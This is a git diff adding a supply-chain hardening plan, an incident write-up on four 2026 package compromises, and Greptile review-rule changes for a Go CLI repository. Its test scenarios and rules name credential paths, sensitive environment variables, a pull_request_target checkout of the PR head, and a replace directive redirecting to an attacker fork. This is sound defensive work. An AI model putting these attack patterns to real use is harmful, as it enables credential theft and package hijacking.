+  <div class="field"><b>Approach:</b> One new <code>customContext.rules</code> entry. Scope: <code>library/**/internal/**/*.go</code>, <code>library/**/cmd/**/*.go</code>. Rule prose names the credential-path literals (<code>.aws/credentials</code>, <code>.ssh/id_</code>, <code>.kube/config</code>, <code>.claude/</code>, <code>.vscode/</code> hooks) and the sensitive env vars (<code>AWS_SECRET_ACCESS_KEY</code>, <code>AWS_SESSION_TOKEN</code>, <code>ACTIONS_ID_TOKEN_REQUEST_URL</code>, <code>GITHUB_TOKEN</code>). The rule instructs Greptile to <em>judge</em> whether the CLI's purpose plausibly explains the credential read: a CLI named <code>aws-foo-pp-cli</code> reading <code>.aws/credentials</code> is fine; a CLI named <code>weather-api-pp-cli</code> reading the same path is a P0 finding.</div>
+  <div class="field"><b>Patterns to follow:</b> The existing manuscript-content rule in <code>greptile.json</code> under <code>"other"</code> is the closest analog — judgment-heavy, prose-driven, scope-specific.</div>
+  <div class="field"><b>Test scenarios:</b>
+    <ul>
+      <li>Sandbox PR adds <code>os.Getenv("AWS_SECRET_ACCESS_KEY")</code> to <code>library/payments/kalshi/internal/client/client.go</code> (Kalshi is not an AWS CLI) → Greptile flags P0.</li>
+      <li>Sandbox PR adds <code>os.Getenv("AWS_SECRET_ACCESS_KEY")</code> to a hypothetical AWS-shaped CLI → Greptile does not flag (judgment).</li>
+      <li>Sandbox PR adds <code>os.Getenv("GITHUB_TOKEN")</code> to a GitHub-shaped CLI → Greptile does not flag.</li>
+      <li>Sandbox PR adds a string literal <code>"~/.claude/settings.json"</code> in any CLI → Greptile flags (the TanStack persistence path; no CLI in this catalog should write there).</li>
+    </ul>
+  </div>
+  <div class="field"><b>Verification:</b> JSON validates. Manual sandbox PRs of each shape produce expected Greptile output. Existing AWS- or GitHub-shaped CLIs in the catalog do not produce spurious findings on unrelated PRs.</div>
+</div>
+
+<div class="unit" id="u5">
+  <h3>U5. Document the new gates in AGENTS.md and a solutions doc</h3>
+  <div class="field"><b>Goal:</b> Future contributors and agents understand what the new rules do, why they exist, and where to look when one fires.</div>
+  <div class="field"><b>Requirements:</b> R10.</div>
+  <div class="field"><b>Dependencies:</b> U1, U2, U3, U4 (sections need final rule/workflow names).</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>AGENTS.md</code> [mod] — new section.</li>
+      <li><code>docs/solutions/security/2026-05-supply-chain-hardening.md</code> — new file in a new <code>security/</code> subdirectory.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b>
+    <ul>
+      <li><b>AGENTS.md section</b> (under existing top-level structure, after "Automated code review with Greptile"): one paragraph naming the new rules and the workflow, one paragraph naming the four incidents that motivated them, one paragraph linking to the solutions doc. Voice matches existing AGENTS.md sections — declarative, names the rule, names the path, names the trigger.</li>
+      <li><b>Solutions doc</b>: incident timeline (Axios Mar 31, TanStack May 11, node-ipc May 14, BufferZoneCorp May 2026), attack-vector taxonomy mapped to the defenses, primary-source citations. Frontmatter follows the existing <code>docs/solutions/</code> convention (sniff one entry under <code>best-practices/</code> for the exact shape before writing).</li>
+      <li>Both files cross-link. AGENTS.md text says "See <code>docs/solutions/security/2026-05-supply-chain-hardening.md</code> for incident details"; the solutions doc references AGENTS.md for the operational rules.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b>
+    <ul>
+      <li>Existing AGENTS.md sections: "Automated code review with Greptile", "Preflight before opening a PR" — voice and structure.</li>
+      <li>Any existing entry under <code>docs/solutions/best-practices/</code> — frontmatter shape and prose density.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Test scenarios:</b> <em>none — this is documentation; verification is presence and accuracy review.</em></div>
+  <div class="field"><b>Verification:</b>
+    <ul>
+      <li><code>grep -n "supply chain" AGENTS.md</code> returns one section heading.</li>
+      <li>Section names the four incidents and the new workflow.</li>
+      <li>Solutions doc cites all four primary sources (Datadog, Socket.dev, Microsoft, Hacker News) with URLs.</li>
+      <li>Both files use repo-relative paths; no absolute paths anywhere.</li>
+    </ul>
+  </div>
+</div>
+
+<div class="unit" id="u6">
+  <h3>U6. Mirror Greptile rules into <code>cli-printing-press/greptile.json</code></h3>
+  <div class="field"><b>Goal:</b> Apply the same rule coverage in the generator repo, with scope adaptations for what doesn't apply there.</div>
+  <div class="field"><b>Requirements:</b> R9.</div>
+  <div class="field"><b>Dependencies:</b> U1 (rule text is mirrored, so finalize U1 first).</div>
+  <div class="field"><b>Files:</b>
+    <ul>
+      <li><code>cli-printing-press/greptile.json</code> [mod or new — confirm file existence in <code>cli-printing-press</code>; if absent, create with the same top-level shape as <code>printing-press-library</code>'s <code>greptile.json</code>]</li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b> Copy four of the six rules from U1 and adapt scope:
+    <ul>
+      <li><b>R1 (workflow trust):</b> apply unchanged. Scope <code>.github/workflows/**</code> exists in both repos.</li>
+      <li><b>R2 (id-token allowlist):</b> apply with adjustment. Generator repo currently has <em>no</em> <code>id-token: write</code> workflow at all. The allowlist is empty; any addition trips the rule. If the future <code>release.yml</code> migrates to keyless cosign with OIDC, allowlist that specific workflow at that time.</li>
+      <li><b>R3 (replace directive tiering):</b> apply with scope swap. In the generator repo, <code>library/**/go.mod</code> does not exist; the equivalent is the generator's own templates and testdata (<code>internal/generator/templates/**</code>, <code>testdata/**</code>). The generator's own <code>go.mod</code> is allowlisted because generator development sometimes uses local <code>replace</code> for fork work.</li>
+      <li><b>R4 (GOPROXY/GOFLAGS):</b> apply unchanged.</li>
+      <li><b>R5 (npm lifecycle):</b> <em>omit.</em> No npm wrapper in the generator repo.</li>
+      <li><b>R6 (module-path drift):</b> <em>omit.</em> No published-CLI module paths to defend.</li>
+      <li><b>R7 (Go credential reads):</b> apply with scope swap. The generator repo's <code>internal/</code> reads no credentials in its normal operation; same severity logic as U4.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b> U1's rule text verbatim where applicable; same prose voice; preserve scope-glob conventions.</div>
+  <div class="field"><b>Test scenarios:</b>
+    <ul>
+      <li>Sandbox PR in <code>cli-printing-press</code> adds a <code>pull_request_target</code> workflow with <code>ref</code> override → Greptile flags R1.</li>
+      <li>Sandbox PR adds <code>id-token: write</code> to any workflow → Greptile flags R2.</li>
+      <li>Sandbox PR adds <code>replace</code> directive in a generator template's example go.mod → Greptile flags R3 per tier.</li>
+      <li>Sandbox PR adds <code>GOPROXY</code> override in a workflow → Greptile flags R4.</li>
+      <li>Sandbox PR adds a <code>postinstall</code>-style script anywhere → no rule fires (R5 omitted by design).</li>
+    </ul>
+  </div>
+  <div class="field"><b>Verification:</b> JSON validates. Sandbox PRs produce expected behavior. Existing generator development PRs (recent main commits) re-run against the new config produce zero spurious findings.</div>
+</div>
+
+<div class="unit" id="u7">
+  <h3>U7. Vendor scan script and workflow into <code>cli-printing-press</code></h3>
+  <div class="field"><b>Goal:</b> The generator repo gets the same mechanical gate as the published library.</div>
+  <div class="field"><b>Requirements:</b> R9.</div>
+  <div class="field"><b>Dependencies:</b> U2 (vendor source), U3 (workflow pattern).</div>
+  <div class="field"><b>Files (in <code>cli-printing-press</code>):</b>
+    <ul>
+      <li><code>cli-printing-press/.github/scripts/verify-supply-chain/__init__.py</code></li>
+      <li><code>cli-printing-press/.github/scripts/verify-supply-chain/scan.py</code></li>
+      <li><code>cli-printing-press/.github/scripts/verify-supply-chain/signals.py</code></li>
+      <li><code>cli-printing-press/.github/scripts/verify-supply-chain/test_scan.py</code></li>
+      <li><code>cli-printing-press/.github/workflows/verify-supply-chain.yml</code></li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b>
+    <ul>
+      <li>Vendor (file-copy) <code>scan.py</code> and <code>test_scan.py</code> verbatim. They are general-purpose.</li>
+      <li>Adapt <code>signals.py</code> per U6's scope adjustments: drop R5 (npm), drop R6 (module-path), retarget R3's path glob from <code>library/**/go.mod</code> to <code>{internal/generator/templates/**/go.mod,testdata/**/go.mod}</code> or whatever the generator-output convention is — confirm by reading the generator repo at U7 time.</li>
+      <li>Vendor the workflow YAML; adjust path filters to match generator-repo paths.</li>
+      <li>A header comment at the top of <code>scan.py</code> in the generator repo names the source repo (<code>printing-press-library</code>) and the date of the vendor copy. Drift is detected by side-by-side review when either copy changes.</li>
+    </ul>
+  </div>
+  <div class="field"><b>Patterns to follow:</b> U2 source; <code>cli-printing-press/.github/scripts/validate-skill-docs.sh</code> is the only existing script there — directory pattern is new but follows <code>printing-press-library</code>'s shape.</div>
+  <div class="field"><b>Execution note:</b> Test-first in this repo too. Re-run U2's pytest fixtures against the vendored copy with adapted paths; all U2 fixtures (minus R5/R6) must pass.</div>
+  <div class="field"><b>Test scenarios:</b> Same as U2's R1, R2, R3, R4, R7 fixtures, re-run against the vendored copy with paths adapted to generator-repo conventions.</div>
+  <div class="field"><b>Verification:</b> <code>pytest</code> green in the generator repo; workflow runs on a sandbox PR; vendor-source header is present and dated.</div>
+</div>
+
+<div class="unit" id="u8">
+  <h3>U8. Mirror AGENTS.md section into <code>cli-printing-press</code></h3>
+  <div class="field"><b>Goal:</b> Generator-repo contributors see the same policy as published-library contributors, with appropriate scope notes.</div>
+  <div class="field"><b>Requirements:</b> R10.</div>
+  <div class="field"><b>Dependencies:</b> U6, U7 (final rule and workflow names).</div>
+  <div class="field"><b>Files (in <code>cli-printing-press</code>):</b>
+    <ul>
+      <li><code>cli-printing-press/AGENTS.md</code> [mod]</li>
+    </ul>
+  </div>
+  <div class="field"><b>Approach:</b> Shorter than U5's section. One paragraph names the new rules and workflow, one paragraph references the <code>printing-press-library</code> solutions doc as the canonical incident-and-rationale source (do <em>not</em> duplicate the incident timeline — single source of truth in the published-library repo).</div>
+  <div class="field"><b>Patterns to follow:</b> Existing AGENTS.md sections in <code>cli-printing-press</code>.</div>
+  <div class="field"><b>Test scenarios:</b> <em>none — documentation.</em></div>
+  <div class="field"><b>Verification:</b> Section exists; cross-link to published-library solutions doc resolves; mentions all rules present in the generator repo's <code>greptile.json</code>.</div>
+</div>
+
+<h2 id="acceptance">Acceptance Examples <a href="#acceptance" class="anchor">#</a></h2>
+
+<table>
+  <thead><tr><th>ID</th><th>Scenario</th><th>Expected outcome</th></tr></thead>
+  <tbody>
+    <tr><td>AE1</td><td>A normal CLI bug-fix PR (changes <code>library/&lt;cat&gt;/&lt;slug&gt;/internal/cli/foo.go</code>; no go.mod, workflow, or npm changes).</td><td><code>verify-supply-chain</code> runs (path-filtered to false on this PR shape), passes green with no annotations. Greptile review is unaffected. PR mergeable.</td></tr>
+    <tr><td>AE2</td><td>An attacker-shaped PR adds a new <code>pull_request_target</code> workflow with <code>ref: ${{ github.event.pull_request.head.sha }}</code>.</td><td><code>verify-supply-chain</code> fails red with a structured error annotation. Greptile posts a P0 finding citing TanStack. The PR cannot merge.</td></tr>
+    <tr><td>AE3</td><td>A PR adds <code>replace github.com/example/foo =&gt; github.com/attacker/fork v0.0.1</code> to <code>library/payments/kalshi/go.mod</code>.</td><td><code>verify-supply-chain</code> fails red. Greptile posts a P0 citing BufferZoneCorp. PR cannot merge.</td></tr>
+    <tr><td>AE4</td><td>A legitimate reprint of <code>library/food-and-dining/ordertogo</code> regenerates its existing three local-path <code>replace</code> directives (no new entries, target shape unchanged).</td><td><code>verify-supply-chain</code> passes (existing lines unchanged; new advise-tier additions = 0). Greptile does not flag. PR mergeable.</td></tr>
+    <tr><td>AE5</td><td>A PR to <code>npm/package.json</code> adds a new <code>postinstall</code> script.</td><td><code>verify-supply-chain</code> fails red. Greptile posts a P0 citing Axios. PR cannot merge.</td></tr>
+    <tr><td>AE6</td><td>A weather-API CLI's PR adds <code>os.Getenv("AWS_SECRET_ACCESS_KEY")</code> to its client code.</td><td><code>verify-supply-chain</code> passes (no mechanical signal here). Greptile posts a P0 from U4's judgment rule asking why a weather CLI reads AWS credentials. Resolution requires either an explanation accepted by the reviewer or a code change.</td></tr>
+    <tr><td>AE7</td><td>A PR rewrites <code>module github.com/mvanhorn/printing-press-library/library/payments/kalshi</code> to <code>module github.com/attacker/kalshi-fork</code>.</td><td><code>verify-supply-chain</code> fails red with module-path-drift annotation. Greptile posts a P0. PR cannot merge.</td></tr>
+  </tbody>
+</table>
+
+<h2 id="risks">Risks &amp; Dependencies <a href="#risks" class="anchor">#</a></h2>
+
+<table>
+  <thead><tr><th>Risk</th><th>Likelihood</th><th>Mitigation</th></tr></thead>
+  <tbody>
+    <tr>
+      <td>False positives on legitimate <code>replace</code> directives.</td>
+      <td>Medium (one CLI today has them).</td>
+      <td>KD5 tiering: local-path targets are advise-only. Existing <code>ordertogo</code> directives don't trip the gate because the scan is diff-aware (only new lines count). Reprints regenerate the same lines verbatim.</td>
+    </tr>
+    <tr>
+      <td>False positives on legitimate auth surfaces (Go CLIs that genuinely read <code>~/.aws/credentials</code>).</td>
+      <td>Medium.</td>
+      <td>U4 is judgment-only (Greptile), never mechanical-block. Greptile reads the CLI's purpose from <code>SKILL.md</code> / <code>README.md</code> / its name and grants context-appropriate findings.</td>
+    </tr>
+    <tr>
+      <td>Day-one merge blocking on legitimate PRs because of mis-tuned regex.</td>
+      <td>Medium.</td>
+      <td>KD7: new check runs informationally for one week. Promoted to required after a clean window. No branch-protection wiring on landing.</td>
+    </tr>
+    <tr>
+      <td>Drift between the two repos' <code>signals.py</code> over time.</td>
+      <td>Low (single admin owns both).</td>
+      <td>Vendor-source header in <code>cli-printing-press/.github/scripts/verify-supply-chain/scan.py</code> names date and source. Drift surfaces on next review of either repo's PR. Parity script deferred (see Scope/Deferred).</td>
+    </tr>
+    <tr>
+      <td>YAML parsing brittle on unusual workflow shapes.</td>
+      <td>Low.</td>
+      <td>Use <code>pyyaml</code> safe-load (already available in the verify-* scripts ecosystem). Test fixtures include the existing repo workflows as known-good inputs.</td>
+    </tr>
+    <tr>
+      <td>Greptile misinterprets rule prose and over- or under-flags.</td>
+      <td>Medium.</td>
+      <td>Two-layer design (KD2): mechanical scan is the authoritative block gate. Greptile is for rationale. A Greptile false-negative still loses the alert but does not let a block-tier attack through — the scan catches those.</td>
+    </tr>
+    <tr>
+      <td>Attacker pre-pollutes a repo and the gate misses it because the attack landed before the gate did.</td>
+      <td>Low (audit confirmed clean baseline).</td>
+      <td>Audit findings documented above (origin/main as of 2026-05-17 is clean for both repos).</td>
+    </tr>
+    <tr>
+      <td>The scan workflow itself becomes an attack surface.</td>
+      <td>Low.</td>
+      <td>Runs as <code>pull_request</code> (not <code>pull_request_target</code>), <code>contents: read</code> only, no <code>id-token</code>. Cannot be turned into a credential-exfil path on its own merits. Treat any PR modifying <code>.github/scripts/verify-supply-chain/**</code> as a Greptile P0 review surface (folded into U1's general workflow-trust prose).</td>
+    </tr>
+  </tbody>
+</table>
+
+<h2 id="sources">Sources &amp; Research <a href="#sources" class="anchor">#</a></h2>
+
+<h3>Primary-source incident references</h3>
+<ul>
+  <li>Socket.dev — <a href="https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack">TanStack mini-Shai-Hulud</a> (May 2026).</li>
+  <li>Datadog Security Labs — <a href="https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/">Axios npm compromise</a> (Mar 31, 2026).</li>
+  <li>Microsoft Security Blog — <a href="https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/">Mitigating Axios npm</a>.</li>
+  <li>Google Cloud Threat Intelligence — <a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package">North Korea–nexus Axios attribution</a>.</li>
+  <li>The Hacker News — <a href="https://thehackernews.com/2026/05/poisoned-ruby-gems-and-go-modules.html">Poisoned Ruby gems and Go modules (BufferZoneCorp)</a>.</li>
+  <li>Security Arsenal — <a href="https://securityarsenal.com/blog/bufferzonecorp-supply-chain-attack-poisoned-ruby-and-go-modules-targeting-ci-pipelines">BufferZoneCorp deep dive</a>.</li>
+  <li>The Hacker News — <a href="https://thehackernews.com/2026/05/tanstack-supply-chain-attack-hits-two.html">TanStack hits OpenAI devices</a>.</li>
+  <li>Axios GitHub — <a href="https://github.com/axios/axios/issues/10636">Post-mortem issue #10636</a>.</li>
+</ul>
+
+<h3>Local repo context used in planning</h3>
+<ul>
+  <li><code>greptile.json</code> at <code>origin/main</code> as of 2026-05-17 — existing rule shape and scope conventions.</li>
+  <li><code>.github/workflows/greptile-policy-gate.yml</code> at <code>origin/main</code> — confirmed safe <code>pull_request_target</code> pattern.</li>
+  <li><code>.github/workflows/npm-publish.yml</code> — confirmed sole legitimate <code>id-token: write</code> location.</li>
+  <li><code>.github/scripts/verify-publish-package/verify_publish_package.py</code> — Python script pattern to mirror for U2.</li>
+  <li><code>.github/scripts/verify-skill/verify_skill.py</code> — allowlist-set pattern (<code>COMMON_FLAGS</code>) to mirror for U2's <code>npm-publish.yml</code> allowlist.</li>
+  <li><code>library/food-and-dining/ordertogo/go.mod</code> — known existing <code>replace</code> directives that informed KD5 tiering.</li>
+  <li><code>cli-printing-press/.github/workflows/conversation-resolution-check.yml</code> at <code>origin/main</code> — confirmed safe <code>pull_request_target</code> pattern in the generator repo.</li>
+  <li><code>cli-printing-press/.github/workflows/release.yml</code> at <code>origin/main</code> — confirmed no <code>id-token</code> grant.</li>
+</ul>
+
+<h3>Planning-time questions resolved</h3>
+<ul>
+  <li><b>Where does the "module path" attack surface live?</b> In <code>library/&lt;cat&gt;/&lt;slug&gt;/go.mod</code>'s <code>module</code> directive. There is no <code>module_path</code> field in <code>.printing-press.json</code>. <code>tools/generate-registry/main.go</code> reads from <code>go.mod</code>.</li>
+  <li><b>Do <code>replace</code> directives appear in any current library go.mod?</b> Yes — three in <code>library/food-and-dining/ordertogo/go.mod</code>, all local <code>./third_party/</code> paths. Informs KD5 tiering.</li>
+  <li><b>Are there any current <code>GOPROXY</code> overrides?</b> No, in either repo. Rule is purely forward-looking.</li>
+  <li><b>Does cli-printing-press have a <code>greptile.json</code> today?</b> To be confirmed at U6 time; the unit handles both "extend" and "create" paths.</li>
+</ul>
+
+<h3>Deferred to implementation time</h3>
+<ul>
+  <li>Exact regex strings inside <code>signals.py</code> — finalize against the test fixtures, not in the plan.</li>
+  <li>Whether to vendor <code>pyyaml</code> via <code>requirements.txt</code> or rely on the runner image's default. Decide when wiring U3.</li>
+  <li>Exact <code>docs/solutions/best-practices/</code> frontmatter shape — read an existing entry at U5 time and match.</li>
+  <li>Exact path glob for the generator repo's <code>replace</code>-directive scope (R3 mirror) — read <code>cli-printing-press</code> directory structure at U7 time.</li>
+</ul>
+
+</body>
+</html>

--- a/docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html
+++ b/docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html
@@ -559,7 +559,7 @@ cli-printing-press/
       <li>Permissions: <code>contents: read</code> only. No <code>id-token</code>, no write permissions.</li>
       <li>Job runs Python 3.12, checks out the PR branch (default ref — safe under <code>pull_request</code>), runs <code>scan.py</code> with <code>--base-ref origin/${{ github.base_ref }}</code> and <code>--head-ref HEAD</code>.</li>
       <li>Concurrency: cancel-in-progress on the same PR.</li>
-      <li>Does <em>not</em> become a required check on day one. After a one-week green window, separately add it to branch protection via <code>matt-github-pat</code> per repo policy.</li>
+      <li>Does <em>not</em> become a required check on day one. After a one-week green window, separately add it to branch protection.</li>
     </ul>
   </div>
   <div class="field"><b>Patterns to follow:</b>

--- a/docs/solutions/security/2026-05-supply-chain-hardening.md
+++ b/docs/solutions/security/2026-05-supply-chain-hardening.md
@@ -1,0 +1,116 @@
+# Supply-chain hardening for printing-press-library and cli-printing-press
+
+_Finding date: 2026-05-17_
+
+## Summary
+
+Four real-world supply-chain attack campaigns in March–May 2026 motivated a set of PR-time defenses across this repo and its upstream generator. The defenses combine Greptile rules (judgment) with a deterministic Python scan workflow (mechanical block gates). This document captures the incident timeline, the attack shapes that drove each defense, and the rule-to-incident mapping.
+
+The plan that landed these defenses: [docs/plans/2026-05-17-001-feat-supply-chain-hardening-plan.html](../../plans/2026-05-17-001-feat-supply-chain-hardening-plan.html). Operational pointers for contributors live in [AGENTS.md](../../../AGENTS.md) under "Supply-chain hardening".
+
+## Incident timeline
+
+### Axios (March 31, 2026)
+
+A maintainer's npm account was compromised. Two malicious patch releases (1.14.1 and 0.30.4) were pushed; the only meaningful change to `package.json` was a new dependency, `plain-crypto-js@4.2.1` — a name-squat on the legitimate `crypto-js` library. The dependency was never imported by Axios code; its sole purpose was a `postinstall` script that dropped a cross-platform RAT (macOS, Windows, Linux), contacting a live C2 server and delivering platform-specific second-stage payloads.
+
+The packages were live for ~3 hours on a dependency with 83M weekly downloads.
+
+Microsoft Threat Intelligence and Google Threat Intelligence Group attributed the campaign to North Korean state actors (Sapphire Sleet / UNC1069).
+
+**Defense applied here:** R5 — block any PR that adds `preinstall`, `postinstall`, or `prepare` to `npm/package.json`. The npm wrapper (`@mvanhorn/printing-press`) is the highest-blast-radius artifact in this repo; compromising it reaches every user.
+
+Primary sources:
+- [Datadog Security Labs — Compromised axios npm package delivers cross-platform RAT](https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/)
+- [Microsoft Security Blog — Mitigating the Axios npm supply chain compromise](https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/)
+- [Google Cloud Threat Intelligence — North Korea–nexus threat actor compromises widely used Axios npm package](https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package)
+- [Axios GitHub — Post-mortem issue #10636](https://github.com/axios/axios/issues/10636)
+
+### TanStack mini-Shai-Hulud (May 11, 2026)
+
+84 TanStack npm artifacts were compromised. The attacker exploited the GitHub Actions `pull_request_target` "Pwn Request" pattern — a workflow with `pull_request_target` trigger that also checks out the PR head ref runs untrusted PR code with the base context's secrets and OIDC tokens. Cache poisoning across the fork-to-base trust boundary, OIDC token extraction from runner process memory, and publication of malicious versions with valid SLSA L3 Sigstore attestations followed.
+
+The payload (`router_init.js`, 2.3 MB obfuscated) harvested credentials from GitHub Actions, AWS (IMDS, Secrets Manager, SSM), HashiCorp Vault, and Kubernetes; persisted via `.claude/` and `.vscode/` directories; and self-propagated through OIDC federation to mint additional npm publish tokens.
+
+The campaign reached devices of two OpenAI employees, forcing macOS updates.
+
+**Defenses applied here:**
+- R1 — block any new `pull_request_target` workflow that overrides the checkout ref to `github.event.pull_request.head.*` or `refs/pull/<n>/{merge,head}`.
+- R2 — block `id-token: write` in any workflow outside the `npm-publish.yml` allowlist. (`npm-publish.yml` uses OIDC Trusted Publishing — the correct posture; anywhere else is a leak vector.)
+- U4 Greptile rule — flag any Go source that writes to `~/.claude/` or `~/.vscode/`, the TanStack persistence sinks.
+
+**Current state audit:** the repo's existing `pull_request_target` workflow (`.github/workflows/greptile-policy-gate.yml`) is safe — it makes API calls only and does not check out PR head code. The generator repo's existing `pull_request_target` workflow (`cli-printing-press/.github/workflows/conversation-resolution-check.yml`) follows the same safe pattern. The new rules are forward-looking gates.
+
+Primary sources:
+- [Socket.dev — TanStack npm packages compromised: Mini Shai-Hulud supply chain attack](https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack)
+- [The Hacker News — TanStack supply chain attack hits two OpenAI employee devices](https://thehackernews.com/2026/05/tanstack-supply-chain-attack-hits-two.html)
+
+### node-ipc (May 14, 2026)
+
+An expired-domain account takeover gave attackers control of the `node-ipc` maintainer account. An obfuscated IIFE was appended after `module.exports`, harvesting 113+ categories of credential files (`~/.aws`, `~/.ssh`, `~/.kube`, browser session storage, env-var caches) and exfiltrating via DNS TXT records through the Session P2P network (`filev2.getsession.org`).
+
+**Defense applied here:** U4 Greptile rule — flag any CLI's Go source that reads home-directory credential paths or sensitive env vars when the CLI's documented purpose doesn't plausibly explain it. Judgment-only, not mechanical; legitimate auth CLIs (AWS-shaped, GitHub-shaped) still pass.
+
+Primary sources:
+- [Socket.dev — TanStack mini-Shai-Hulud writeup (cross-incident references node-ipc shape)](https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack)
+
+### BufferZoneCorp (May 2026)
+
+A "sleeper packages" campaign: initially clean Ruby gems and Go modules were published under the `BufferZoneCorp` GitHub account, masquerading as recognizable names (`activesupport-logger`, `devise-jwt`, `go-retryablehttp`, `grpc-client`, `config-loader`). After a dwell period of days to weeks, the maintainers pushed payload-bearing updates that:
+
+- Used `replace` directives to redirect Go module resolution to attacker forks.
+- Set `GOPROXY` / `GONOSUMCHECK` environment variables in CI to bypass checksum verification.
+- Planted fake Go wrappers to intercept commands.
+- Established SSH persistence by adding attacker keys to `authorized_keys`.
+
+Packages were eventually yanked from RubyGems and blocked from the Go module proxy.
+
+**Defenses applied here:**
+- R3 — tier `replace` directives in `library/**/go.mod` by target shape. Remote targets (host segment with a dot, or any URL scheme) hard-fail; local paths (`./...`, `../...`) emit advisory notices but do not block (legitimate local vendoring exists in `library/food-and-dining/ordertogo/go.mod`).
+- R4 — block `GOPROXY`, `GOFLAGS`, `GONOSUMCHECK`, `GOSUMDB`, or `GONOSUMDB` overrides in any `env:` block under `.github/workflows/**`.
+- R6 — block `module` directive drift on an existing `library/**/go.mod` (must continue to start with `github.com/mvanhorn/printing-press-library/library/`). Renaming a published CLI is a generator-repo operation; manual go.mod edits to the `module` line are the BufferZoneCorp install-redirect attack shape applied to this catalog's structure.
+
+Primary sources:
+- [The Hacker News — Poisoned Ruby Gems and Go Modules Exploit CI Pipelines for Credential Theft](https://thehackernews.com/2026/05/poisoned-ruby-gems-and-go-modules.html)
+- [Security Arsenal — BufferZoneCorp Supply Chain Attack: Poisoned Ruby & Go Modules Targeting CI Pipelines](https://securityarsenal.com/blog/bufferzonecorp-supply-chain-attack-poisoned-ruby-and-go-modules-targeting-ci-pipelines)
+
+## Defense architecture
+
+Two layers, applied identically across both repos.
+
+**Greptile rules** (`greptile.json` in each repo) — judgment-heavy review. Greptile reads the CLI's purpose (SKILL.md, README.md, `.printing-press.json` display name) and decides whether a credential read is incongruous, whether a `replace` directive's stated purpose is plausible, whether a `pull_request_target` workflow combines with checkout-PR-head in a dangerous way. Findings post as P0 / P1 comments with rationale.
+
+**`verify-supply-chain.yml`** — deterministic mechanical gate. Python scan at `.github/scripts/verify-supply-chain/scan.py` regex-matches each touched file from the PR diff against the signal catalog in `signals.py`. Block-severity findings exit non-zero and produce GitHub Actions error annotations. Advisory findings produce notices without affecting exit code. Run locally with `python3 .github/scripts/verify-supply-chain/scan.py --base-ref origin/main`.
+
+Mechanical gate is authoritative for block decisions; Greptile is for rationale and judgment. False positives in Greptile do not block; false positives in the scan can be addressed by adjusting `signals.py` and adding a test case.
+
+## Defense-to-incident mapping
+
+| Defense | Rule ID | Layer | Primary attack |
+|---|---|---|---|
+| `pull_request_target` + PR-head checkout | R1 | Greptile + scan | TanStack |
+| `id-token: write` outside `npm-publish.yml` | R2 | Greptile + scan | TanStack |
+| `replace` directive → remote target | R3 (block) | Greptile + scan | BufferZoneCorp |
+| `replace` directive → local path | R3 (advise) | Greptile + scan | BufferZoneCorp (precaution) |
+| `GOPROXY` / `GOFLAGS` / `GONOSUMCHECK` env override | R4 | Greptile + scan | BufferZoneCorp |
+| `postinstall` / `preinstall` / `prepare` in `npm/package.json` | R5 | Greptile + scan | Axios |
+| `module` directive drift on existing CLI | R6 | Greptile + scan | BufferZoneCorp (catalog variant) |
+| Go-source credential-path reads in incongruous CLI | (U4 rule) | Greptile only | node-ipc, TanStack |
+
+## What is not covered
+
+- Real-time runtime sandboxing of `go install`, `npx`, or any user-machine execution.
+- Sigstore/Fulcio signing changes (the npm wrapper already uses OIDC Trusted Publishing).
+- Mandatory 2FA enforcement.
+- Slack/Discord alerting on scan findings.
+- Real-time dependency-age checks against the npm registry API.
+- Retroactive sweep of already-published CLIs for any pattern the new scan flags.
+- SHA256 IOC matching against known malicious payload hashes.
+- Base64-array obfuscator heuristics.
+- Egress blocking of known C2 hosts at the org perimeter.
+
+Several of these are documented as future considerations in the plan.
+
+## Rollout posture
+
+The `verify-supply-chain` workflow runs informationally for one week. After a green window with no false-positive miscalibration on real PRs, it is promoted to a required check via branch protection. The published-library PR lands first; the `cli-printing-press` mirror follows after the published-library deployment stabilizes — calibration on the larger repo (more PR throughput, more diverse touch surface) reduces the chance of duplicating any miscalibration into the upstream generator.

--- a/greptile.json
+++ b/greptile.json
@@ -55,7 +55,7 @@
       },
       {
         "scope": ["library/**/go.mod"],
-        "rule": "P0. The `module` directive in library/<cat>/<slug>/go.mod is the canonical module path used by `go install` and the registry generator. It must remain prefixed with github.com/mvanhorn/printing-press-library/library/. A PR that rewrites an existing CLI's module directive to a non-canonical path silently redirects every future install (BufferZoneCorp variant). Renaming or moving a published CLI is a generator-repo operation, not a manual go.mod edit. Flag any module directive change on an existing CLI that breaks the canonical prefix."
+        "rule": "P0. The `module` directive in library/<cat>/<slug>/go.mod is the canonical module path used by `go install` and the registry generator. ANY change to an existing CLI's module directive should block, whether it drifts outside the canonical prefix github.com/mvanhorn/printing-press-library/library/ (the original BufferZoneCorp redirect-to-attacker-fork shape) OR stays within the canonical prefix as a rename (e.g., kalshi → kalshi-evil — still redirects `go install` for users pinned to the old slug). Renaming or moving a published CLI is a generator-pipeline operation, not a manual go.mod edit. Flag any module-directive change on an existing CLI. New CLIs must still use the canonical prefix."
       },
       {
         "scope": ["library/**/internal/**/*.go", "library/**/cmd/**/*.go"],

--- a/greptile.json
+++ b/greptile.json
@@ -32,6 +32,34 @@
       {
         "scope": ["library/**/.printing-press.json"],
